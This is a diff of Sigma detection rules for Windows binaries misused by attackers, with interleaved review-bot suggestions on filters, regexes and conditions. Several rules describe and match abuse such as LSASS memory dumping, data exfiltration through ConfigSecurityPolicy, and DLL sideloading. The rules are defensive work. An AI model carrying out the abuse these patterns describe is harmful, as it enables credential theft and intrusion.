https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html 
@@ -24,11 +23,11 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \cdb.exe
- - OriginalFileName: CDB.Exe
+ - NewProcessName|endswith: \cdb.exe
+ - OriginalFileName: CDB.Exe
 selection_cli:
- CommandLine|contains:
- - ' -c '
+ CommandLine|contains:
+ - ' -c ' # Using a debugger script
 - ' -cf '
 condition: process_creation and (all of selection*)
 falsepositives:
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml
index 749e65eca..9cb89dc71 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml
@@ -1,11 +1,10 @@
 title: Custom Class Execution via Xwizard
 id: 53d4bb30-3f36-4e8a-b078-69d36c4a79ff
 status: test
-description: Detects the execution of Xwizard tool with specific arguments which utilized
- to run custom class properties.
+description: Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/
-author: "Ensar \u015Eamil, @sblmsrsn, @oscd_initiative"
+author: Ensar Şamil, @sblmsrsn, @oscd_initiative
 date: 2020/10/07
 modified: 2021/11/27
 tags:
@@ -19,8 +18,8 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|re: \{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\}
- NewProcessName|endswith: \xwizard.exe
+ CommandLine|re: \{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\}
+ NewProcessName|endswith: \xwizard.exe
 condition: process_creation and selection
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_cmdl32.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_cmdl32.yml
index 2011aa5d7..08af1a576 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_cmdl32.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_cmdl32.yml
@@ -21,10 +21,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \cmdl32.exe
- - OriginalFileName: CMDL32.EXE
+ - NewProcessName|endswith: \cmdl32.exe
+ - OriginalFileName: CMDL32.EXE
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - '/vpn '
 - '/lan '
 condition: process_creation and (all of selection*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml
index a15afe560..e8554ecc0 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml
@@ -1,8 +1,7 @@
 title: Suspicious ConfigSecurityPolicy Execution
 id: 1f0f6176-6482-4027-b151-00071af39d7e
 status: test
-description: Upload file, credentials or data exfiltration with Binary part of Windows
- Defender
+description: Upload file, credentials or data exfiltration with Binary part of Windows Defender
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/
 author: frack113
@@ -19,11 +18,11 @@ detection:
 EventID: 4688
 Channel: Security
 lolbas:
- - CommandLine|contains: ConfigSecurityPolicy.exe
- - NewProcessName|endswith: \ConfigSecurityPolicy.exe
- - OriginalFileName: ConfigSecurityPolicy.exe
+ - CommandLine|contains: ConfigSecurityPolicy.exe
+ - NewProcessName|endswith: \ConfigSecurityPolicy.exe
+ - OriginalFileName: ConfigSecurityPolicy.exe
 remote:
- CommandLine|contains:
+ CommandLine|contains:
 - https://
 - http://
 - ftp://
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_customshellhost.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_customshellhost.yml
index 3d5d1fc51..d5beb1a03 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_customshellhost.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_customshellhost.yml
@@ -1,8 +1,7 @@
 title: Suspicious CustomShellHost Execution
 id: 84b14121-9d14-416e-800b-f3b829c5a14d
 status: test
-description: Detects the execution of CustomShellHost binary where the child isn't
- located in 'C:\Windows\explorer.exe'
+description: Detects the execution of CustomShellHost binary where the child isn't located in 'C:\Windows\explorer.exe'
 references:
 - https://github.com/LOLBAS-Project/LOLBAS/pull/180
 - https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/
@@ -21,7 +20,7 @@ detection:
 selection:
 ParentProcessName|endswith: \CustomShellHost.exe
 filter:
- NewProcessName: C:\Windows\explorer.exe
+ NewProcessName: C:\Windows\explorer.exe
 condition: process_creation and (selection and not filter)
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml
index 8c26999f5..25697d859 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml
@@ -22,13 +22,13 @@ detection:
 EventID: 4688
 Channel: Security
 selection_cli:
- CommandLine|contains:
+ CommandLine|contains:
 - '/in:'
 - '/out:'
 - '/uri:'
 selection_img:
- - NewProcessName|endswith: \DataSvcUtil.exe
- - OriginalFileName: DataSvcUtil.exe
+ - NewProcessName|endswith: \DataSvcUtil.exe
+ - OriginalFileName: DataSvcUtil.exe
 condition: process_creation and (all of selection*)
 fields:
 - SubjectUserName
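Review bot: The re-indented `filter` in the CustomShellHost rule keeps the exclusion bound to the literal `C:\Windows\explorer.exe`, so on a host where Windows is installed on another drive the legitimate explorer.exe child is not excluded and the rule fires on every CustomShellHost launch; the same commit names exactly this case in the xwizard DLL-sideloading rule (`- Windows installed on non-C drive`), and the mavinject rule's `filter` (`ParentProcessName: C:\Windows\System32\AppVClient.exe`) carries the same dependency. At minimum replace the `- Unknown` false-positive entry here with `- Windows installed on non-C drive`; relaxing to `NewProcessName|endswith: \Windows\explorer.exe` is an option only if a looser exclusion is acceptable for this rule.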
@@ -37,10 +37,7 @@ fields:
 - ParentCommandLine
 falsepositives:
 - DataSvcUtil.exe being used may be performed by a system administrator.
- - Verify whether the user identity, user agent, and/or hostname should be making
- changes in your environment.
- - DataSvcUtil.exe being executed from unfamiliar users should be investigated.
- If known behavior is causing false positives, it can be exempted from the
- rule.
+ - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+ - DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml
index dc2472298..6f7b6b621 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml
@@ -20,9 +20,9 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- NewProcessName|endswith: \dctask64.exe
+ NewProcessName|endswith: \dctask64.exe
 filter:
- CommandLine|contains: DesktopCentral_Agent\agent
+ CommandLine|contains: DesktopCentral_Agent\agent
 condition: process_creation and (selection and not filter)
 fields:
 - ParentProcessName
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_defaultpack.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_defaultpack.yml
index 6fc616f47..5297a10c9 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_defaultpack.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_defaultpack.yml
@@ -1,8 +1,7 @@
 title: Lolbin Defaultpack.exe Use As Proxy
 id: b2309017-4235-44fe-b5af-b15363011957
 status: test
-description: Detect usage of the "defaultpack.exe" binary as a proxy to launch other
- programs
+description: Detect usage of the "defaultpack.exe" binary as a proxy to launch other programs
 references:
 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/
 - https://www.echotrail.io/insights/search/defaultpack.exe
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml
index 59b029aa7..f05ab0c9c 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml
@@ -1,8 +1,7 @@
 title: DeviceCredentialDeployment Execution
 id: b8b1b304-a60f-4999-9a6e-c547bde03ffd
 status: test
-description: Detects the execution of DeviceCredentialDeployment to hide a process
- from view
+description: Detects the execution of DeviceCredentialDeployment to hide a process from view
 references:
 - https://github.com/LOLBAS-Project/LOLBAS/pull/147
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -18,7 +17,7 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- NewProcessName|endswith: \DeviceCredentialDeployment.exe
+ NewProcessName|endswith: \DeviceCredentialDeployment.exe
 condition: process_creation and selection
 falsepositives:
 - Unlikely
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml
index eff88fbf8..4fbbc9020 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml
@@ -19,8 +19,8 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains: LaunchForDeploy
- NewProcessName|endswith: \devtoolslauncher.exe
+ CommandLine|contains: LaunchForDeploy
+ NewProcessName|endswith: \devtoolslauncher.exe
 condition: process_creation and selection
 falsepositives:
 - Legitimate use of devtoolslauncher.exe by legitimate user
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_diantz_ads.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_diantz_ads.yml
index b6d422bc7..a5af809c4 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_diantz_ads.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_diantz_ads.yml
@@ -1,8 +1,7 @@
 title: Suspicious Diantz Alternate Data Stream Execution
 id: 6b369ced-4b1d-48f1-b427-fdc0de0790bd
 status: test
-description: Compress target file into a cab file stored in the Alternate Data Stream
- (ADS) of the target file.
+description: Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Diantz/
 author: frack113
@@ -19,10 +18,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - diantz.exe
 - .cab
- CommandLine|re: :[^\\]
+ CommandLine|re: :[^\\]
 condition: process_creation and selection
 falsepositives:
 - Very Possible
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml
index e05eee5a5..2bbdd08ee 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml
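Review bot: `CommandLine|re: :[^\\]` in the re-indented diantz ADS `selection` matches any colon not followed by a backslash, and `://` in a URL-style argument satisfies it just as well as the `file.ext:stream` form the rule is after, so a diantz command line carrying a URL anywhere is reported as an ADS write. Excluding a forward slash as well, `CommandLine|re: :[^\\/]`, keeps the ADS pattern while dropping URL schemes; the extrac32_ads rule later in this commit uses the identical expression and should get the same change. The `falsepositives` entry `Very Possible` could then say what the residual source is (plain `drive:file` arguments).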
@@ -1,8 +1,7 @@
 title: Suspicious Diantz Download and Compress Into a CAB File
 id: 185d7418-f250-42d0-b72e-0c8b70661e93
 status: test
-description: Download and compress a remote file and store it in a cab file on local
- machine.
+description: Download and compress a remote file and store it in a cab file on local machine.
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Diantz/
 author: frack113
@@ -19,7 +18,7 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - diantz.exe
 - ' \\\\'
 - .cab
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml
index 84deac96e..1948bd7f0 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml
@@ -1,8 +1,7 @@
 title: Xwizard DLL Sideloading
 id: 193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1
 status: test
-description: Detects the execution of Xwizard tool from the non-default directory
- which can be used to sideload a custom xwizards.dll
+description: Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/
 - http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
@@ -20,9 +19,9 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- NewProcessName|endswith: \xwizard.exe
+ NewProcessName|endswith: \xwizard.exe
 filter:
- NewProcessName|startswith: C:\Windows\System32\
+ NewProcessName|startswith: C:\Windows\System32\
 condition: process_creation and (selection and not filter)
 falsepositives:
 - Windows installed on non-C drive
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_dnx.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_dnx.yml
index b2f1ec9ef..f47ee6910 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_dnx.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_dnx.yml
@@ -20,7 +20,7 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- NewProcessName|endswith: \dnx.exe
+ NewProcessName|endswith: \dnx.exe
 condition: process_creation and selection
 falsepositives:
 - Legitimate use of dnx.exe by legitimate user
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_dotnet.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_dotnet.yml
index 848f571b2..e8b8d6b7d 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_dotnet.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_dotnet.yml
@@ -20,10 +20,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \dotnet.exe
- - OriginalFileName: .NET Host
+ - NewProcessName|endswith: \dotnet.exe
+ - OriginalFileName: .NET Host
 selection_cli:
- CommandLine|endswith:
+ CommandLine|endswith:
 - .dll
 - .csproj
 condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_dotnet_dump.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_dotnet_dump.yml
index 82d8e6959..f6e258c0e 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_dotnet_dump.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_dotnet_dump.yml
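Review bot: `CommandLine|endswith` with `.dll` and `.csproj` in the re-indented dotnet `selection_cli` misses the common case where the argument is quoted, because the recorded command line then ends with `"` rather than with the extension. Add the quoted variants next to the existing values, `- .dll"` and `- .csproj"`, so both spellings are caught by the same selection. The dnx rule just above has no command-line constraint at all, which is consistent with its `falsepositives` entry, so no change there.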
@@ -1,8 +1,7 @@
 title: Process Memory Dump Via Dotnet-Dump
 id: 53d8d3e1-ca33-4012-adf3-e05a4d652e34
 status: experimental
-description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution
- could indicate potential process dumping of critical processes such as LSASS
+description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS
 references:
 - https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-dump#dotnet-dump-collect
 - https://twitter.com/bohops/status/1635288066909966338
@@ -19,14 +18,12 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \dotnet-dump.exe
- - OriginalFileName: dotnet-dump.dll
+ - NewProcessName|endswith: \dotnet-dump.exe
+ - OriginalFileName: dotnet-dump.dll
 selection_cli:
- CommandLine|contains: collect
+ CommandLine|contains: collect
 condition: process_creation and (all of selection_*)
 falsepositives:
- - Process dumping is the expected behavior of the tool. So false positives are
- expected in legitimate usage. The PID/Process Name of the process being dumped
- needs to be investigated
+ - Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_dump64.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_dump64.yml
index 8a06a0e88..ce7829abd 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_dump64.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_dump64.yml
@@ -1,8 +1,7 @@
 title: Suspicious Dump64.exe Execution
 id: 129966c9-de17-4334-a123-8b58172e664d
 status: test
-description: Detects when a user bypasses Defender by renaming a tool to dump64.exe
- and placing it in a Visual Studio folder
+description: Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder
 references:
 - https://twitter.com/mrd0x/status/1460597833917251595
 author: Austin Songer @austinsonger, Florian Roth
@@ -19,15 +18,14 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- NewProcessName|endswith: \dump64.exe
+ NewProcessName|endswith: \dump64.exe
 procdump_flags:
- CommandLine|contains:
+ CommandLine|contains:
 - ' -ma '
 - accepteula
 filter:
- NewProcessName|contains: \Installer\Feedback\dump64.exe
- condition: process_creation and (( selection and not filter ) or ( selection and
- procdump_flags ))
+ NewProcessName|contains: \Installer\Feedback\dump64.exe
+ condition: process_creation and (( selection and not filter ) or ( selection and procdump_flags ))
 falsepositives:
 - Dump64.exe in other folders than the excluded one
 level: high
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_extexport.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_extexport.yml
index 2220871c6..404e73995 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_extexport.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_extexport.yml
@@ -1,8 +1,7 @@
 title: Suspicious Extexport Execution
 id: fb0b815b-f5f6-4f50-970f-ffe21f253f7a
 status: test
-description: Extexport.exe loads dll and is execute from other folder the original
- path
+description: Extexport.exe loads dll and is execute from other folder the original path
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Extexport/
 author: frack113
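Review bot: The joined `condition` in the dump64 hunk, `process_creation and (( selection and not filter ) or ( selection and procdump_flags ))`, repeats `selection` on both sides of the `or`, which hides the actual intent (the Feedback-folder copy is excluded only when it is not run with procdump-style flags) and makes the now single line noticeably longer than the rest of the file. The logically identical `condition: process_creation and (selection and (not filter or procdump_flags))` states that in one read. A short comment on the `filter` entry naming the Visual Studio feedback copy it exempts would also spare the next reader a trip to the reference.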
@@ -19,9 +18,9 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- - CommandLine|contains: Extexport.exe
- - NewProcessName|endswith: \Extexport.exe
- - OriginalFileName: extexport.exe
+ - CommandLine|contains: Extexport.exe
+ - NewProcessName|endswith: \Extexport.exe
+ - OriginalFileName: extexport.exe
 condition: process_creation and selection
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_extrac32.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_extrac32.yml
index ea81085eb..e79f78dc7 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_extrac32.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_extrac32.yml
@@ -18,13 +18,13 @@ detection:
 EventID: 4688
 Channel: Security
 selection_lolbas:
- - CommandLine|contains: extrac32.exe
- - NewProcessName|endswith: \extrac32.exe
- - OriginalFileName: extrac32.exe
+ - CommandLine|contains: extrac32.exe
+ - NewProcessName|endswith: \extrac32.exe
+ - OriginalFileName: extrac32.exe
 selection_archive:
- CommandLine|contains: .cab
+ CommandLine|contains: .cab
 selection_options:
- CommandLine|contains:
+ CommandLine|contains:
 - /C
 - /Y
 - ' \\\\'
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_extrac32_ads.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_extrac32_ads.yml
index 5bb46d379..9dc8b86de 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_extrac32_ads.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_extrac32_ads.yml
@@ -18,10 +18,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - extrac32.exe
 - .cab
- CommandLine|re: :[^\\]
+ CommandLine|re: :[^\\]
 condition: process_creation and selection
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_format.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_format.yml
index bd2fa062c..ea8c59825 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_format.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_format.yml
@@ -1,9 +1,7 @@
 title: Format.com FileSystem LOLBIN
 id: 9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60
 status: test
-description: Detects the execution of format.com with a suspicious filesystem selection
- that could indicate a defense evasion activity in which format.com is used to
- load malicious DLL files or other programs
+description: Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs
 references:
 - https://twitter.com/0gtweet/status/1477925112561209344
 - https://twitter.com/wdormann/status/1478011052130459653?s=20
@@ -19,10 +17,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains: '/fs:'
- NewProcessName|endswith: \format.com
+ CommandLine|contains: '/fs:'
+ NewProcessName|endswith: \format.com
 filter:
- CommandLine|contains:
+ CommandLine|contains:
 - /fs:FAT
 - /fs:exFAT
 - /fs:NTFS
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml
index 8c79d9477..fc8f98916 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml
@@ -1,8 +1,7 @@
 title: Use of FSharp Interpreters
 id: b96b2031-7c17-4473-afe7-a30ce714db29
 status: test
-description: The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL
- bypass and is listed in Microsoft recommended block rules.
+description: The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.
 references:
 - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
 - https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
@@ -21,10 +20,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- - NewProcessName|endswith: \fsianycpu.exe
- - OriginalFileName: fsianycpu.exe
- - NewProcessName|endswith: \fsi.exe
- - OriginalFileName: fsi.exe
+ - NewProcessName|endswith: \fsianycpu.exe
+ - OriginalFileName: fsianycpu.exe
+ - NewProcessName|endswith: \fsi.exe
+ - OriginalFileName: fsi.exe
 condition: process_creation and selection
 falsepositives:
 - Legitimate use by a software developer.
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_ftp.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_ftp.yml
index 1d3294d2b..ab5a43001 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_ftp.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_ftp.yml
@@ -1,8 +1,7 @@
 title: LOLBIN Execution Of The FTP.EXE Binary
 id: 06b401f4-107c-4ff9-947f-9ec1e7649f1e
 status: test
-description: Detects execution of ftp.exe script execution with the "-s" or "/s" flag
- and any child processes ran by ftp.exe
+description: Detects execution of ftp.exe script execution with the "-s" or "/s" flag and any child processes ran by ftp.exe
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Ftp/
 author: Victor Sergeev, oscd.community
@@ -23,10 +22,10 @@ detection:
 selection_parent:
 ParentProcessName|endswith: \ftp.exe
 selection_ftp_img:
- - NewProcessName|endswith: \ftp.exe
- - OriginalFileName: ftp.exe
+ - NewProcessName|endswith: \ftp.exe
+ - OriginalFileName: ftp.exe
 selection_ftp_cli:
- CommandLine|contains:
+ CommandLine|contains:
 - '-s:'
 - '/s:'
 condition: process_creation and (selection_parent or all of selection_ftp_*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_gather_network_info.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_gather_network_info.yml
index 9023653c7..b875ca9f1 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_gather_network_info.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_gather_network_info.yml
@@ -1,13 +1,12 @@
 title: Potential Reconnaissance Activity Via GatherNetworkInfo.VBS
 id: 575dce0c-8139-4e30-9295-1ee75969f7fe
 related:
- - id: f92a6f1e-a512-4a15-9735-da09e78d7273
- type: similar
- - id: 07aa184a-870d-413d-893a-157f317f6f58
- type: similar
+ - id: f92a6f1e-a512-4a15-9735-da09e78d7273 # FileCreate
+ type: similar
+ - id: 07aa184a-870d-413d-893a-157f317f6f58 # ProcCreation Susp
+ type: similar
 status: test
-description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs".
- Which can be used to gather information about the target machine
+description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
 references:
 - https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs
 - https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government
@@ -27,14 +26,14 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith:
- - \cscript.exe
- - \wscript.exe
- - OriginalFileName:
- - cscript.exe
- - wscript.exe
+ - NewProcessName|endswith:
+ - \cscript.exe
+ - \wscript.exe
+ - OriginalFileName:
+ - cscript.exe
+ - wscript.exe
 selection_cli:
- CommandLine|contains: gatherNetworkInfo.vbs
+ CommandLine|contains: gatherNetworkInfo.vbs
 condition: process_creation and (all of selection_*)
 falsepositives:
 - Administrative activity
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_gpscript.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_gpscript.yml
index 347444272..9a2f0aaf1 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_gpscript.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_gpscript.yml
@@ -1,8 +1,7 @@
 title: Gpscript Execution
 id: 1e59c230-6670-45bf-83b0-98903780607e
 status: experimental
-description: Detects the execution of the LOLBIN gpscript, which executes logon or
- startup scripts configured in Group Policy
+description: Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy
 references:
 - https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
 - https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
@@ -20,10 +19,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \gpscript.exe
- - OriginalFileName: GPSCRIPT.EXE
+ - NewProcessName|endswith: \gpscript.exe
+ - OriginalFileName: GPSCRIPT.EXE
 selection_cli:
- CommandLine|contains:
+ CommandLine|contains:
 - ' /logon'
 - ' /startup'
 filter_main_svchost:
diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_ie4uinit.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_ie4uinit.yml
index 5a2274aa2..2b898bd45 100644
--- a/sigma/builtin/process_creation/proc_creation_win_lolbin_ie4uinit.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_ie4uinit.yml
@@ -1,8 +1,7 @@
 title: Ie4uinit Lolbin Use From Invalid Path
 id: d3bf399f-b0cf-4250-8bb4-dfc192ab81dc
 status: test
-description: Detect use of ie4uinit.exe to execute commands from a specially prepared
- ie4uinit.inf file from a directory other than the usual directories
+description: Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/
 - https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
@@ -20,17 +19,16 @@ detection:
 EventID: 4688
 Channel: Security
 lolbin:
- - NewProcessName|endswith: \ie4uinit.exe
- - OriginalFileName: IE4UINIT.EXE
+ - NewProcessName|endswith: \ie4uinit.exe
+ - OriginalFileName: IE4UINIT.EXE
 filter_correct:
 CurrentDirectory:
 - c:\windows\system32\
 - c:\windows\sysWOW64\
 filter_missing:
- CurrentDirectory: null
+ CurrentDirectory:
 condition: process_creation and (lolbin and not 1 of filter_*)
 falsepositives:
- - ViberPC updater calls this binary with the following commandline "ie4uinit.exe
- -ClearIconCache"
